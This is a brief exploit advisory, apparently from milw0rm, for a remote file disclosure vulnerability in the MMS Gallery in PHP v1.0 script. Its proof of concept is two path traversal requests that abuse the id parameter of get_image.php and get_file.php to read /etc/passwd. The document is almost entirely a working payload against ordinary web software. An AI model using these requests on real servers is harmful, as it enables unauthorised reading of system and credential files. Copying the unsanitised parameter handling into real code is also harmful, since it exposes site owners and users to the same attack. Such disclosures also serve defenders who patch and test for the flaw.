MMS Gallery in PHP v1.0 (id) Remote File Disclosure Vulnerability
D.Script : http://www.mms2web.com/mms_gallery_php.zip
POC :
/mms_template/get_image.php?id=../../../../../../../../etc/passwd
/mms_template/get_file.php?id=../../../../../../../../etc/passwd
# milw0rm.com [2007-12-13]